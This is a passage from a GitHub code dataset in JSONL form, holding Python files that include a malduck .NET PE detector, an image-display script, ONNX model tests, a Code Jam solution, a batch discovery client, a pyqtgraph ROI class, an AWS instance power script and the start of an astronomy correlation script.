self.readv(self.imgbase, 2) != self.__magic__:\r\n return False\r\n pe_offs = self.uint32v(self.imgbase + 0x3C)\r\n if pe_offs is None:\r\n return False\r\n if self.readv(self.imgbase + pe_offs, 2) != b\"PE\":\r\n return False\r\n try:\r\n dn = DnPE(self)\r\n if not hasattr(dn, \"net\"):\r\n return False\r\n\r\n return True\r\n except Exception:\r\n return False\r\n\r\n @property\r\n def pe(self) -> DnPE:\r\n \"\"\"Related :class:`PE` object\"\"\"\r\n if self._pe is None:\r\n self._pe = DnPE(self)\r\n return self._pe\r\n\r\n\r\nprocmemdnpe = ProcessMemoryDnPE\r\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/procmem/procmemdnpe.py","file_name":"procmemdnpe.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"}
+{"seq_id":"74520575874","text":"import matplotlib.pyplot as plt\n\nfrom utilities import *\n\n# !pip install h5py\nX_train, y_train, X_test, y_test = load_data()\n\nprint(\"taille de mon set d'entrainement sur x\", X_train.shape)\nprint(\"taille de mon set d'entrainement sur y\", y_train.shape)\n\nprint(\"taille de mon set de test sur x\", X_test.shape)\nprint(\"taille de mon set de test sur Y\", y_test.shape)\n\n# y_train = y_train.T\n# y_test = y_test.T\n#\n# X_train = X_train.T\n# X_train_reshape = X_train.reshape(-1, X_train.shape[-1]) / X_train.max()\n# X_test = X_test.T\n# X_test_reshape = X_test.reshape(-1, X_test.shape[-1]) / X_train.max()\n#\n# print(\"taille de mon set d'entrainement transposé sur x\", X_train.shape)\n# print(\"taille de mon set d'entrainement transposé and reshaped sur x\", X_train_reshape.shape)\n# print(\"taille de mon set d'entrainement transposé sur y\", y_train.shape)\n# #\n# m_train = 300\n# m_test = 80\n# a = X_test.reshape[:, :m_test]\n# print(\"taille de mon set d'entrainement reshaped sur x\", a.shape)\n\n# x_train_reshape = X_train.reshape[:, :m_train]\n# y_train=y_train[:, :m_train]\n# y_test=y_test[:, :m_test]\n#\n# print(\"taille de mon set d'entrainement sur x\", x_train_reshape.shape)\n# print(\"taille de mon set de test sur x\", x_test_reshape.shape)\n# print(\"taille de mon set d'entrainement sur y\", y_train.shape)\n# print(\"taille de mon set de test sur y\", y_test.shape)\n# plt.figure(figsize=(10,10))\n# plt.imshow(x_train[0])\n# plt.show()\n\n\n# facon copilot d'afficher les 10 premiere photo\n# plt.figure(figsize=(16, 8))\n# for i in range(9):\n# plt.subplot(3, 3, i+1)\n# plt.imshow(x_train[i])\n# plt.title(y_train[i])\n# plt.axis('off')\n# plt.show()\n\n\n# facon youtube pour afficher les 10 premiere photo\nplt.figure(figsize=(16, 8))\nfor i in range(1, 10):\n plt.subplot(4, 5, i)\n plt.imshow(X_train[i], cmap='gray')\n if y_train[i] == 0:\n plt.title('cat')\n else:\n plt.title('dog')\n # plt.title(y_train[i])\n plt.tight_layout()\nplt.show()\n","repo_name":"hichemseriket/monReseauDeNeuronnes","sub_path":"chatVSchien.py","file_name":"chatVSchien.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1234383477","text":"import os\nimport sys\n\nimport numpy as np\nimport onnxruntime as rt\n\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"../\"))\ntry:\n from tools.onnx_converter import smartPickleLoader\nexcept Exception:\n raise\n\n\ndef test_clf():\n sklearn_clf = smartPickleLoader(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.model\")\n )\n onnx_clf = rt.InferenceSession(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.model.onnx\")\n )\n\n clf_in_name = onnx_clf.get_inputs()[0].name\n clf_out_name = onnx_clf.get_outputs()[0].name\n\n vec = np.random.rand(10000, 7) * 1 - 1.7\n assert (sklearn_clf.predict(vec) == onnx_clf.run([clf_out_name], {clf_in_name: vec.astype(np.float32)})[0]).all()\n\n\ndef test_scaler():\n sklearn_scaler = smartPickleLoader(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.scaler\")\n )\n onnx_scaler = rt.InferenceSession(\n os.path.join(os.path.dirname(__file__), \"../src/lung_segmentor_itk/svm181020.scaler.onnx\")\n )\n\n scaler_in_name = onnx_scaler.get_inputs()[0].name\n scaler_out_name = onnx_scaler.get_outputs()[0].name\n\n vec = np.random.rand(10000, 7) * 100 - 200\n assert (\n np.max(\n np.abs(\n sklearn_scaler.transform(vec)\n - onnx_scaler.run([scaler_out_name], {scaler_in_name: vec.astype(np.float32)})[0]\n )\n )\n < 1e-3\n )\n","repo_name":"TangWen920812/ATM2022","sub_path":"docker/lungsegitk/test/test_sklearn_onnx.py","file_name":"test_sklearn_onnx.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"}
+{"seq_id":"23547355121","text":"import sys\n\nsys.setrecursionlimit(3000)\n\nt = int(input())\n \ndef replacer(a, k):\n\t\n\treturn a\n\t\ndef flip(s, m, c):\n\tt = s.find('-')\n\n\ta = s[t:t+m]\n\n\tif len(a) < m or c > 3000:\n\t\treturn 'IMPOSSIBLE'\n\telse:\n\t\ta = a.replace('+','p').replace('-', 'n')\n\t\ta = a.replace('p', '-').replace('n', '+')\n\t\tb = s[:t] + a + s[t+m:]\n\t\t\n\t\tif '-' in b:\n\t\t\treturn flip(b, m, c+1)\n\t\telse:\n\t\t\treturn c\n\nfor i in range(1, t + 1):\n\tn, m = [str(s) for s in input().split(\" \")]\n\tm = int(m)\n\tif '-' in n:\n\t\tnumero = flip(n,m,1)\n\n\t\tprint(\"Case #{}: {}\".format(i,numero))\n\telse:\n\t\tprint(\"Case #{}: {}\".format(i, 0) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3748.py","file_name":"3748.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28896549180","text":"from __future__ import print_function\n\nimport atexit\nimport copy\nimport datetime\ntry:\n # ujson is 5x-10x faster\n import ujson as json\nexcept ImportError:\n import json\nimport logging\nimport os\nimport Queue\nimport re\nimport sys\nimport time\n\nfrom concurrent import futures\nimport requests\n\nfrom waldoc import client\n\nLOG = logging.getLogger(__name__)\n\n\nclass DiscoveryMonitorTimeoutError(Exception):\n\n \"\"\"Discovery is considered stale, something probably went wrong.\"\"\"\n\n\nclass PersistenceFile(object):\n\n \"\"\"Wrapper for the batch discovery JSON persistence file.\n\n Default file location in shell.py:\n ~/.waldo_batch_discoveries.json\n\n May include a thread-safe queue for passing data\n in the form below (schema).\n\n Tuples will be formatted to json according to the schema\n of the peristence file upon calling self.write_queued()\n\n Schema:\n {\n : {\n : ,\n : ,\n }\n : {\n : ,\n : ,\n }\n }\n\n P.S. - 'synq' -> Synchronized Queue\n \"\"\"\n def __init__(self, path, writer_queue=None):\n \"\"\"Initialize using path to file and optional thread-safe queue.\n\n Queue is used for json serializable data to be written to file when\n self.write_queued() is called.\n\n If the file at 'path' doesn't exist it will be created.\n \"\"\"\n\n self.path = os.path.realpath(os.path.expanduser(path))\n if not os.path.exists(self.path):\n print(\"Persistence file %s does not exist yet, creating it...\")\n json.dump({}, open(self.path, 'w'))\n else:\n # check for json-ness\n try:\n json.load(open(self.path))\n LOG.debug(\"Loaded existing persistence file %s.\",\n os.path.relpath(self.path))\n except ValueError as err:\n raise ValueError(\"The persistence file -> %s is not \"\n \"a valid json file. | %s\"\n % (os.path.relpath(self.path), err))\n if writer_queue and not isinstance(writer_queue, Queue.Queue):\n raise TypeError('writer_queue should be a Queue.Queue.')\n elif writer_queue:\n self.synq = writer_queue\n self.synq._persisted = set()\n else:\n self.synq = None\n\n def load(self):\n \"\"\"Return the deserialized json object.\"\"\"\n return json.load(open(self.path))\n\n def save(self, data):\n \"\"\"Save data to file.\n\n Careful, this overwrites any existing data on file.\n Use self.udpate() to perform partial updates.\n \"\"\"\n json.dump(data, open(self.path, 'w'))\n\n def set_queue(self, writer_queue=None):\n \"\"\"Provide a queue or have one created for you.\n\n Always return the queue and set it as self.synq\n \"\"\"\n if writer_queue and not isinstance(writer_queue, Queue.Queue):\n raise TypeError('writer_queue should be a Queue.Queue.')\n elif not writer_queue:\n writer_queue = Queue.Queue()\n self.synq = writer_queue\n return self.synq\n\n def get_queue(self):\n \"\"\"Return the queue associated with this file wrapper.\"\"\"\n if not self.synq:\n raise AttributeError(\"No queue specified, set one with \"\n \"self.set_queue(Queue...)\")\n return self.synq\n\n def write_queued(self):\n \"\"\"Write data from the backing synchronized queue the file.\"\"\"\n if not self.synq:\n raise AttributeError(\"No queue specified, set one with \"\n \"self.set_queue(Queue...)\")\n towrite = {}\n while not self.synq.empty():\n try:\n towrite.update(self.synq.get_nowait())\n except Queue.Empty:\n pass\n return self.update(towrite)\n\n def update(self, data):\n \"\"\"Perform a friendly update of the json on file.\n\n Works like a dictionary-merge going 1 level deep.\n\n Ex:\n\n existing file # persistence.json\n ---------------------------------\n # persistence.json\n {\n 'target_a': {\n 'tag_1': 'uuid_abc',\n }\n }\n\n self.update({'target_a': {'tag_2': 'uuid_xyz'},\n 'target_b': {'tag_1': 'uuid_def'}})\n\n The 'target_a' dictionary will be merged, and\n target_b would be added, resulting in:\n\n updated file # persistence.json\n --------------------------------\n {\n 'target_a': {\n 'tag_1': 'uuid_abc',\n 'tag_2': 'uuid_xyz',\n },\n 'target_b': {\n 'tag_1': 'uuid_def',\n }\n }\n\n \"\"\"\n updating = self.load()\n check_delta = copy.deepcopy(updating)\n for target, document in data.iteritems():\n if target in updating and document != updating[target]:\n LOG.debug(\"Updating existing target %s record in persistence file \"\n \"with tags: %s\", target, document.keys())\n updating[target].update(document)\n elif target in updating and document == updating[target]:\n # nothing to update\n continue\n else:\n LOG.debug(\"Adding target %s to persistence file.\", target)\n updating[target] = document\n # only open/write file if there are changes\n if updating != check_delta:\n self.save(updating)\n\n def purge(self):\n \"\"\"Replace all data on file with an empty object, '{}'.\"\"\"\n decision = raw_input(\"\\nAre you sure you want to reset your \"\n \"persistence file %s? \"\n % os.path.relpath(self.path))\n if not 'y' in decision.lower():\n print(\"Aborting purge.\")\n return\n self.save({})\n\n def remove(self, targets=None, tags=None):\n \"\"\"Remove items from persisted data which match tags or targets.\"\"\"\n if not targets and not tags:\n raise AttributeError(\n \"No 'targets' or 'tags' specified for removal.\")\n persisted = self.load()\n # create object that is the loaded data minus tags and targets and re-write it\n excluding = {}\n removed = 0\n for trgt, data in persisted.items():\n if targets and trgt in targets:\n # skip the entire target\n removed += len(data)\n continue\n excluding[trgt] = data\n for tag in data.iterkeys():\n if tags and tag in tags:\n # remove selected tags\n if excluding[trgt].pop(tag, None):\n removed += 1\n continue\n remaining = sum((len(k) for k in excluding.values()))\n print(\"Removed %s items, leaving %s remaining.\"\n % (removed, remaining))\n self.save(excluding)\n\n\n def list_targets_by_tags(self, seedtags):\n \"\"\"Load list of targets from persistence file based on tags.\"\"\"\n loaded = self.load()\n matched_targets = [k for k, v in loaded.iteritems()\n if all(j in v for j in seedtags)]\n if not matched_targets:\n raise StandardError(\"No existing targets found in persistence file \"\n \"from tags: '%s'\", \"', '\".join(seedtags))\n return matched_targets\n\n\ndef is_netloc(netloc):\n try:\n int(netloc)\n return False\n except ValueError:\n return True\n\n\ndef to_datetime(time_string):\n \"\"\"Convert standard time string to a datetime object.\"\"\"\n try:\n return datetime.datetime.strptime(\n time_string, '%Y-%m-%d %X %z')\n except ValueError:\n time_string = time_string[:-5].strip()\n return datetime.datetime.strptime(\n time_string, '%Y-%m-%d %X')\n\n\ndef from_targets_file(targets_file):\n \"\"\"Load targets from file.\"\"\"\n if not os.path.exists(targets_file):\n raise ValueError(\"Targets file %s does not exist.\",\n os.path.relpath(targets_file))\n else:\n with open(targets_file, 'rU') as tfile:\n targets = list({m.strip() for k in tfile.readlines()\n for m in k.split() if m.strip()})\n for target in copy.copy(targets):\n if target.startswith('#'):\n targets.remove(target)\n continue\n if '.' not in target and ':' not in target:\n try:\n int(target)\n except StandardError:\n targets.remove(target)\n if not targets:\n raise ValueError(\"No targets were found in file %s.\",\n os.path.relpath(targets_file))\n else:\n print(\"Loaded targets from file %s\" % targets_file)\n return targets\n\n\ndef should_skip(target, tags, persistence_file):\n \"\"\"Find existing discovery id with matching target and tags.\"\"\"\n persisted_data = persistence_file.load().get(target)\n if persisted_data:\n discovery_id = {persisted_data.get(t) for t in tags}\n if all(discovery_id) and len(discovery_id) == 1:\n return discovery_id.pop()\n # a single discovery must match *all* tags for should_skip\n # to return a discovery id\n\n\ndef purge_persistence_file(persistence_file, targets=None, tags=None):\n\n if not os.path.exists(persistence_file):\n raise ValueError(\"Persistence file %s does not exist. \"\n \"Nothing to purge.\"\n % os.path.relpath(persistence_file))\n persistence_file = PersistenceFile(persistence_file)\n if not targets and not tags:\n persistence_file.purge()\n else:\n persistence_file.remove(targets=targets, tags=tags)\n\n\ndef get_persisted_data(persistence_file, tags=None, targets=None):\n\n if not isinstance(persistence_file, PersistenceFile):\n raise TypeError(\n \"persistence_file should be an instance of PersistenceFile\")\n loaded = persistence_file.load()\n if targets:\n loaded = {j: k for j, k in loaded.items()\n if j in targets}\n if tags:\n loaded = {j: k for j, k in loaded.items()\n if all(tag in k for tag in tags)}\n for data in loaded.itervalues():\n for tag in data.copy().iterkeys():\n if tag not in tags:\n data.pop(tag, None)\n return loaded\n\n\ndef show_persisted_data(args):\n\n persistence_file = PersistenceFile(args.persistence_file)\n loaded = get_persisted_data(persistence_file, args.tags, args.targets)\n import json as orig_json\n print(orig_json.dumps(loaded, sort_keys=True, indent=4))\n\ndef batch_discovery(args):\n \"\"\"Run, manage, and monitor a batch discovery.\"\"\"\n\n pfile_queue = Queue.Queue()\n persistence_file = PersistenceFile(args.persistence_file,\n writer_queue=pfile_queue)\n\n if args.targets:\n targets = args.targets\n elif args.targets_file:\n targets = from_targets_file(args.targets_file)\n else:\n if not args.seed_tags:\n decision = raw_input(\n \"\\nNo --seed-tags, --targets, or --targets-file provided. \"\n \"Continue using current tag(s) -> %s as seed tags for new \"\n \"batch discovery? ( To see which targets this implies, run \"\n \"`waldo batch data --tags %s` ) \"\n % (args.tags, \" \".join(args.tags)))\n if not 'y' in decision.lower():\n print(\"Aborting batch discovery.\")\n return\n else:\n new_tag_name = raw_input(\n \"%s will be used as seed tag(s). Now you need new tag \"\n \"name: \" % args.tags)\n if not new_tag_name:\n print(\"Invalid tag name. Aborting.\")\n else:\n args.seed_tags = args.tags\n args.tags = [j.strip()\n for j in re.split(r'\\W+', new_tag_name)]\n targets = persistence_file.list_targets_by_tags(\n args.seed_tags or args.tags)\n\n assert targets, \"No targets (netlocs or account numbers) provided\"\n waldo_client = client.Waldo(args.username, password=args.password,\n token=args.token, password_from_user=True)\n\n store = {}\n job_queue = {}\n with futures.ThreadPoolExecutor(args.max_running) as pool:\n ensure_streamhandler()\n try:\n while targets:\n selected = targets.pop()\n LOG.debug(\"Looking at %s. Targets remaining: %s\",\n selected, len(targets))\n # should_skip returns the discovery_id if we already have one\n # for this target/tags combo\n shouldskip = should_skip(selected, args.tags,\n persistence_file)\n if shouldskip:\n store[selected] = {tag: shouldskip for tag in args.tags}\n fut = pool.submit(monitor_discovery, shouldskip, waldo_client)\n atexit.register(fut.cancel)\n print(\"Monitoring existing discovery %s for \"\n \"target %s with tag(s): %s\"\n % (shouldskip, selected, args.tags))\n else:\n store[selected] = {tag: None for tag in args.tags}\n fut = pool.submit(create_and_monitor_discovery, selected,\n waldo_client, args.dataplane, args.tags,\n persistence_file.synq)\n atexit.register(fut.cancel)\n print(\"Triggered discovery (dataplane: %s) for \"\n \"target %s with tag(s): %s\"\n % (args.dataplane, selected, args.tags))\n persistence_file.update(store)\n time.sleep(.25)\n\n job_queue[fut] = selected\n atexit.register(pool.shutdown, wait=False)\n return manage_job_queue(job_queue, persistence_file)\n except KeyboardInterrupt:\n print(\"\\nShutting down threadpool...\")\n for job in job_queue:\n job.cancel()\n pool.shutdown(wait=False)\n sys.exit('KeyboardInterrupt')\n\n\ndef manage_job_queue(job_queue, persistence_file):\n\n results = {}\n oldstats = {}\n while not all(k._state == 'FINISHED' for k in job_queue):\n # create a dict of stats using Futures in job_queue\n # print them when each loop only if they've changed\n persistence_file.write_queued()\n time.sleep(1)\n states = [job._state for job in job_queue]\n newstats = {_state: states.count(_state) for _state in set(states)}\n if newstats != oldstats:\n import json as orig_json\n print(\"Job queue stats:\")\n print(orig_json.dumps(newstats, sort_keys=True, indent=4))\n oldstats = newstats\n finished = [j for j in job_queue if j._state == 'FINISHED'\n and job_queue[j] not in results]\n for job in finished:\n try:\n result = job.result()\n except Exception as err:\n print(err)\n result = err\n did = 'unknown'\n dstatus = \"%s: %s\" % (err.__class__.__name__, err)\n else:\n did = result['id']\n dstatus = result['status']\n trgt = job_queue[job]\n results[trgt] = result\n print(\"%s finished. Status: %s ID: %s\"\n % (trgt, dstatus, did))\n\n\n for job, target in job_queue.iteritems():\n try:\n result = job.result()\n except Exception as err:\n print(err)\n result = err\n results[target] = result\n\n return results\n\n\nclass CurrentFileFilter(logging.Filter):\n \"\"\"Only emit logs originating in this file.\"\"\"\n\n name = \"%s Logging Filter\" % os.path.relpath(__file__)\n\n def filter(self, logrecord):\n \"\"\"Filter logs which don't originate in this file.\"\"\"\n if os.path.realpath(logrecord.pathname) != os.path.realpath(__file__):\n return False\n return True\n\n_CURRENTFILEFILTER = CurrentFileFilter()\nCurrentFileFilter = lambda: _CURRENTFILEFILTER\n\n\ndef ensure_streamhandler(level=logging.INFO):\n \"\"\"Ensure that a StreamHandler to stdout is attached to root logger.\"\"\"\n\n cffilt = CurrentFileFilter()\n frmt = logging.Formatter(fmt='%(asctime)s: %(message)s')\n rootlogger = logging.getLogger()\n if not rootlogger.isEnabledFor(level):\n rootlogger.setLevel(level)\n for hand in rootlogger.handlers:\n if isinstance(hand, logging.StreamHandler):\n if hand.level < level:\n hand.setLevel(level)\n if hand.stream != sys.stdout:\n hand.stream = sys.stdout\n hand.addFilter(cffilt)\n hand.setFormatter(frmt)\n break\n else:\n console = logging.StreamHandler(stream=sys.stdout)\n console.setLevel(level)\n console.set_name('Batch discovery stdout streamhandler')\n console.addFilter(cffilt)\n console.setFormatter(frmt)\n rootlogger.addHandler(console)\n\n\ndef create_and_monitor_discovery(target, waldo_client, dataplane,\n tags, pfqueue):\n \"\"\"Return discovery only after Waldo has finished it.\n\n Since this function is often ran in a separate thread, we will rely on\n the logging module to get messages to stdout, so ensure_streamhandler()\n is always called when the function runs.\n \"\"\"\n try:\n if is_netloc(target):\n discovery = waldo_client.create_discovery(netloc=target,\n dataplane=dataplane,\n tags=tags)\n else:\n discovery = waldo_client.create_discovery(account_number=target,\n dataplane=dataplane,\n tags=tags)\n rttags = discovery['metadata'].get('tags')\n assert rttags == tags\n assert bool(discovery['dataplane']) == bool(dataplane)\n except requests.exceptions.HTTPError as err:\n LOG.error(\"Error requesting discovery on target %s | %s\",\n target, err)\n raise\n else:\n if discovery['id'] not in pfqueue._persisted:\n pfqueue.put({target: {t: discovery['id'] for t in rttags}})\n pfqueue._persisted.add(discovery['id'])\n LOG.info(\"Successfully triggered discovery for target %s. \"\n \"Monitoring for this discovery begins now.\", target)\n return monitor_discovery(discovery['id'], waldo_client)\n\n\ndef monitor_discovery(discovery_id, waldo_client, timeout=60*60, wait=5):\n \"\"\"Monitor discovery with a default timeout of 1 hour.\n\n If timestamp on discovery is observed to be older than 'timeout' seconds,\n raise DiscoveryMonitorTimeoutError.\n\n Since this function is often ran in a separate thread, we will rely on\n the logging module to get messages to stdout, so ensure_streamhandler()\n is always called when the function runs.\n \"\"\"\n discovery = None\n try:\n discovery = waldo_client.get_discovery(\n discovery_id, include_system_info=False)\n except (ValueError, TypeError) as err:\n LOG.error(\"Failed to decode or fetch discovery %s. Will retry. | %s\",\n discovery_id, str(err))\n else:\n if discovery and (discovery['status']\n not in ['REQUESTED', 'PENDING']):\n return discovery\n else:\n # check for staleness\n dtime = to_datetime(discovery['time'])\n age = datetime.datetime.utcnow() - dtime\n if age > datetime.timedelta(seconds=timeout):\n raise DiscoveryMonitorTimeoutError(\n \"Giving up on discovery of age %s\" % age)\n # else retry\n time.sleep(wait)\n return monitor_discovery(discovery_id, waldo_client,\n timeout=timeout, wait=wait)\n","repo_name":"shterrel/Waldo","sub_path":"waldo-client/waldoc/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":20589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8547455004","text":"from typing import Collection, Dict\n\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nfrom ..structures import OptionsDict, XYVertices\nfrom ..views.rois import SHAPE_ROI_MAPPING, PlotDataROI\n\n__all__ = [\"RoiCollection\"]\n\n\nclass RoiCollection(QtCore.QObject):\n # Signal(ExtendedROI)\n sigShapeFinished = QtCore.Signal(object) # roiVertices : XYVertices\n\n def __init__(\n self,\n allowableShapes: Collection[OptionsDict] = (),\n parent: pg.GraphicsView = None,\n ):\n super().__init__(parent)\n\n if allowableShapes is None:\n allowableShapes = set()\n self.shapeVerts = XYVertices()\n # Make a new graphics item for each roi type\n self.parameterRoiMap: Dict[OptionsDict, PlotDataROI] = {}\n self._shapeParameter = (\n next(iter(allowableShapes)) if len(allowableShapes) > 0 else None\n )\n\n self._locks = set()\n self.addLock(self)\n self._parent = parent\n\n for shape in allowableShapes:\n newRoi = SHAPE_ROI_MAPPING[shape]()\n newRoi.setZValue(1000)\n self.parameterRoiMap[shape] = newRoi\n newRoi.setRoiPoints()\n newRoi.hide()\n self.addRoisToView(parent)\n\n def addRoisToView(self, view: pg.GraphicsView):\n self._parent = view\n if view is not None:\n for roi in self.parameterRoiMap.values():\n roi.hide()\n view.addItem(roi)\n\n def clearAllRois(self):\n for roi in self.parameterRoiMap.values(): # type: PlotDataROI\n roi.setRoiPoints()\n roi.hide()\n self.addLock(self)\n # If all ROIs share the same action stack, calling \"flush\" on one should\n # take care of everything But this is a failsafe against separate undo\n # buffers for each shape\n roi.flushBuildActions()\n\n def addLock(self, lock):\n \"\"\"\n Allows this shape collection to be `locked`, preventing shapes from being drawn.\n Multiple locks can be applied; ROIs can only be drawn when all locks are removed.\n\n Parameters\n ----------\n lock\n Anything used as a lock. This will have to be manually removed later using\n ``RoiCollection.removeLock``\n \"\"\"\n self._locks.add(lock)\n\n def removeLock(self, lock):\n try:\n self._locks.remove(lock)\n except KeyError:\n pass\n\n def forceUnlock(self):\n self._locks.clear()\n\n @property\n def locked(self):\n return len(self._locks) > 0\n\n def buildRoi(self, ev: QtGui.QMouseEvent, imageItem: pg.ImageItem = None):\n \"\"\"\n Construct the current shape ROI depending on mouse movement and current shape\n parameters\n\n Parameters\n ----------\n imageItem\n Image the ROI is drawn upon, used for mapping event coordinates from a\n scene to pixel coordinates. If *None*, event coordinates are assumed to\n already be relative to pixel coordinates.\n ev\n Mouse event\n \"\"\"\n # Unblock on mouse press\n # None imageItem is only the case during programmatic calls so allow this case\n if (\n (imageItem is None or imageItem.image is not None)\n and ev.type() == QtCore.QEvent.Type.MouseButtonPress\n and ev.button() == QtCore.Qt.MouseButton.LeftButton\n ):\n self.removeLock(self)\n if self.locked:\n return False\n eventPos = ev.position() if hasattr(ev, \"position\") else ev.localPos()\n if imageItem is not None:\n posRelToImg = imageItem.mapFromScene(eventPos)\n else:\n posRelToImg = eventPos\n # Form of rate-limiting -- only simulate click if the next pixel is at least\n # one away from the previous pixel location\n xyCoord = XYVertices([[posRelToImg.x(), posRelToImg.y()]], dtype=float)\n curRoi = self.currentShape\n constructingRoi, self.shapeVerts = self.currentShape.updateShape(ev, xyCoord)\n if self.shapeVerts is not None:\n self.sigShapeFinished.emit(self.shapeVerts)\n\n if not constructingRoi:\n # Vertices from the completed shape are already stored, so clean up the\n # shapes.\n curRoi.setRoiPoints()\n curRoi.hide()\n else:\n # Still constructing ROI. Show it\n curRoi.show()\n return constructingRoi\n\n @property\n def shapeParameter(self):\n return self._shapeParameter\n\n @shapeParameter.setter\n def shapeParameter(self, newShape: OptionsDict):\n \"\"\"\n When the shape is changed, be sure to reset the underlying ROIs\n \"\"\"\n # Reset the underlying ROIs for a different shape than we currently are using\n if newShape != self._shapeParameter:\n self.clearAllRois()\n self._shapeParameter = newShape\n\n @property\n def currentShape(self):\n return self.parameterRoiMap[self._shapeParameter]\n","repo_name":"ntjess/s3a","sub_path":"s3a/controls/drawctrl.py","file_name":"drawctrl.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72225719234","text":"\n# Script to power on and power off aws-instances. Make sure to run aws configure and set your account before executing this script. Also, boto3 aws package should be# installed\n\nimport sys\nimport boto3\nfrom botocore.exceptions import ClientError\n\nec2 = boto3.client('ec2')\n\nresponse = ec2.describe_instances()\n\n# Required output will be in 'Reservations'\n\noutput = response['Reservations']\n\n# calculate the length of the output rather list\n\ninstance_ids = [] # This is an empty list of instances\n\nfor i in range(len(output)):\n instance_ids.append(output[i]['Instances'][0]['InstanceId'])\n\ndef poweron():\n #This currently powers on ubuntu and vsrx\n for i in instance_ids:\n try:\n response_out = ec2.start_instances(InstanceIds=[i], DryRun=False)\n print(response_out)\n except ClientError as e:\n print(e)\n\ndef poweroff():\n #This powers off ubuntu and srx\n for i in instance_ids:\n try:\n response_out = ec2.stop_instances(InstanceIds=[i], DryRun=False)\n print(response_out)\n except ClientError as e:\n print(e)\n\nif str.lower(sys.argv[1]) == 'on':\n\tpoweron()\nelif str.lower(sys.argv[1]) == 'off':\n poweroff()\nelse:\n\tprint(\"Key words supported on and off! exiting\")\n\tsys.exit(1)\n\n","repo_name":"yukthr/auts","sub_path":"random_programs/aws/start_aws.py","file_name":"start_aws.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"8637656088","text":"import warnings\nfrom glob import glob\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import pearsonr\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom tqdm import tqdm\nfrom astropy.time import Time\nfrom astropy.table import Table\nfrom astropy.units import UnitsWarning\n\nfrom source_names_dict import source_names_dict, source_names_w_counterparts, source_names_readable\n\nwarnings.filterwarnings('ignore', category=UnitsWarning, append=True)\n\ndef line(x, m, c):\n return m*x+c\n\ndef df_properties(tab, tab_name):\n prop = {}\n prop['name'] = tab_name\n prop['length'] = len(tab)\n prop['N_obs'] = len(np.unique(tab[\"OBSID\"]))\n prop['N_bad'] = len(tab[tab['BAD'] == True])\n prop['N_good'] = len(tab[tab['BAD'] == False])\n prop['N_UL'] = len(tab[tab['UL'] == True])\n return prop\n \ndef get_exluded_obs(tab_big, tab_small):\n obs1 = np.unique(tab_big['OBSID'])\n obs2 = np.unique(tab_small['OBSID'])\n obs_excluded = np.setdiff1d(obs1,obs2)\n obs_excluded = list(obs_excluded)\n return obs_excluded\n\ndef calc_subsets(tab):\n uvot_rate = 'COI_SRC_RATE'\n uvot_rate_err = 'COI_SRC_RATE_ERR'\n xrt_rate = 'Rate'\n xrt_rate_err = 'Ratepos'\n \n \n tables = {}\n \n # Add idx column for original position\n tab['idx'] = range(len(tab))\n \n \n # Filter out 5 sigma outliers\n xrt_rate_mean = np.mean(tab[xrt_rate])\n uvot_rate_mean = np.mean(tab[uvot_rate])\n\n xrt_rate_std = np.std(tab[xrt_rate])\n uvot_rate_std = np.std(tab[uvot_rate])\n\n tables['tab_5_sig'] = tab[(tab[xrt_rate] < xrt_rate_mean + 5 * xrt_rate_std)\n & (tab[xrt_rate] > xrt_rate_mean - 5 * xrt_rate_std)\n & (tab[uvot_rate] < uvot_rate_mean + 5 * uvot_rate_std)\n & (tab[uvot_rate] > uvot_rate_mean - 5 * uvot_rate_std)]\n\n # Get UL and BAD subsets\n tab_5_sig = tables['tab_5_sig']\n tables['tab_UL'] = tab_5_sig[tab_5_sig['UL'] == True]\n tables['tab_no_UL'] = tab_5_sig[tab_5_sig['UL'] == False]\n\n tables['tab_BAD'] = tab_5_sig[tab_5_sig['BAD'] == True]\n tables['tab_no_BAD'] = tab_5_sig[tab_5_sig['BAD'] == False]\n\n tables['tab_UL_no_bad'] = tab_5_sig[(tab_5_sig['BAD'] == False) & (tab_5_sig['UL'] == True)]\n tables['tab_no_UL_no_bad'] = tab_5_sig[(tab_5_sig['BAD'] == False) & (tab_5_sig['UL'] == False)]\n return tables\n \n\ndef correlate(fits_path, include_bad, include_UL):\n ####################\n # SETUP SIMULATION # \n ####################\n\n res = {} # Dictionary for storing results\n\n # IF YOU CHANGE THIS, CHANGE THEM IN CALC_SUBSETS TOO\n uvot_rate = 'COI_SRC_RATE'\n uvot_rate_err = 'COI_SRC_RATE_ERR'\n xrt_rate = 'Rate'\n xrt_rate_err = 'Ratepos'\n\n N_mc = 10000\n \n print('correlate()')\n print('----------')\n print('Input:')\n print(f'fits_path = {fits_path}')\n print(f'include_bad = {include_bad}')\n print(f'include_UL = {include_UL}')\n print(f'N_mc = {N_mc}')\n print('')\n\n if 'curve_nosys' in fits_path:\n xrt_curve = 'FULL'\n xrt_rate_err = 'Ratepos'\n elif 'hardrat' in fits_path:\n xrt_curve = fits_path.split('/')[-1].split(',')[-1][:-5]\n xrt_rate_err = 'Error'\n\n print('Using XRT 